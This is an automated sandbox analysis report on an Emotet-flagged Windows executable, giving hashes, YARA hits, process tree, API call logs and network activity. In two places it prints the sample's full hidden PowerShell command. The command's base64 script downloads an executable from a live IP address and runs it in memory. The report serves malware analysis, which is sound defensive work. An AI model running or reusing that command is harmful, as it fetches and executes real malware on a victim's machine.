Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	March 3, 2025, 2:42 p.m.	March 3, 2025, 2:50 p.m.

Size	264.3KB
Type	PE32+ executable (GUI) x86-64, for MS Windows
MD5	`73ff439239900589550d046df99566f7`
SHA256	`ae577a74a4544fd340b9df46efec6246b3902fa7c4dad9da732aedf571dcf562`
CRC32	`097D4A8B`
ssdeep	`6144:0eR7eammZbop0yN90vEx6q7M6VY+lberm/8WAW:0eRtBZb5y90ilvWrK86`
PDB Path	wextract.pdb
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE64 - (no description) Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet CAB_file_format - CAB archive file Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet UPX_Zero - UPX packed file

tg01985462ss.exe "C:\Users\test22\AppData\Local\Temp\tg01985462ss.exe"
2660
- cmd.exe cmd /c "tg01985462s.bat"
  2728
  - powershell.exe powershell -WindowStyle Hidden -ep bypass -nop -Command "& {Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHdjPU5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQKJHdjLkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS85MC4wLjQ0MzAuNzIgU2FmYXJpLzUzNy4zNicpCiRieXRlcz0kd2MuRG93bmxvYWREYXRhKCdodHRwOi8vMjMuMjcuNDYuNjAvYTAwMDEvdGcwMTk4NTQ2Mi5leGUnKQokYXNzZW09W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRieXRlcykKJGFzc2VtLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKQ==')))}"
    2828

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch
23.27.46.60	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW March 3, 2025, 2:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 3, 2025, 2:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 3, 2025, 2:42 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 3, 2025, 2:43 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 3, 2025, 2:43 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 3, 2025, 2:43 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 3, 2025, 2:43 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 3, 2025, 2:43 p.m.			0	0

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW March 3, 2025, 2:42 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\IXP000.TMP> console_handle: 0x0000000000000007	1	1	0
WriteConsoleW March 3, 2025, 2:42 p.m.	buffer: '■' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x000000000000000b	1	1	0

Uses Windows APIs to generate a cryptographic key (44 events)

Time & API	Arguments	Status	Return
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002d61c0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000350ce0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000350ce0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0000000000350ce0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9ce670 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9ce670 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9ce600 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9ce600 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9ce600 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9ce600 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9ce6e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9ce6e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9ce6e0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9ce9f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9ce9f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9ce9f0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9ceec0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9ceec0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9ceec0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9ceec0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9ceec0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9ceec0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9ceec0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9ceec0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9ceec0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9ceec0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9ceec0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9cefa0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9cefa0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9cf010 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9cf010 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9cf080 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9cf080 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9cf080 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002befa0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002befa0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002befa0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00000000002befa0 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9fab80 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001b9fab80 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001ba28300 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001ba28300 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001ba28300 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1
CryptExportKey March 3, 2025, 2:43 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x000000001ba28300 flags: 0 crypto_export_handle: 0x0000000000000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

wextract.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 3, 2025, 2:42 p.m.		1	1	0

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

AVI

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

Connection to IP address

suspicious_request

GET http://23.27.46.60/a0001/tg01985462.exe

Performs some HTTP requests (1 event)

request

GET http://23.27.46.60/a0001/tg01985462.exe

Allocates read-write-execute memory (usually to unpack itself) (50 out of 202 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 1703936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002b40000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002c60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef39b1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c2e000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c2e000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c2f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c2f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c2f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c2f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c2f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c2f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c2f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c2f000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c30000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c30000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c30000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c30000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c30000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c31000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c31000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c31000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c31000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c2e000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00052000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 589824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0010a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002c62000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 12288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002c64000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0011a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00053000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00054000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00142000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0011d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0010b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00102000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00055000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00190000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00056000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00143000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0010c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00103000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0004a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00057000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory March 3, 2025, 2:43 p.m.	process_identifier: 2828 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002c67000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\tg01985462s.bat

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (1 event)

cmdline

powershell -WindowStyle Hidden -ep bypass -nop -Command "& {Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHdjPU5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQKJHdjLkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS85MC4wLjQ0MzAuNzIgU2FmYXJpLzUzNy4zNicpCiRieXRlcz0kd2MuRG93bmxvYWREYXRhKCdodHRwOi8vMjMuMjcuNDYuNjAvYTAwMDEvdGcwMTk4NTQ2Mi5leGUnKQokYXNzZW09W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRieXRlcykKJGFzc2VtLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKQ==')))}"

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
